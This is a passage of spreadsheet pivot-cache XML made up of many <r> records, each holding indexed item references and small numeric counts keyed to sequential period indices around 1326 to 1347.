    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="36"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="36"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="15"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="37"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="118"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="17"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="18"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="90"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="23"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="42"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
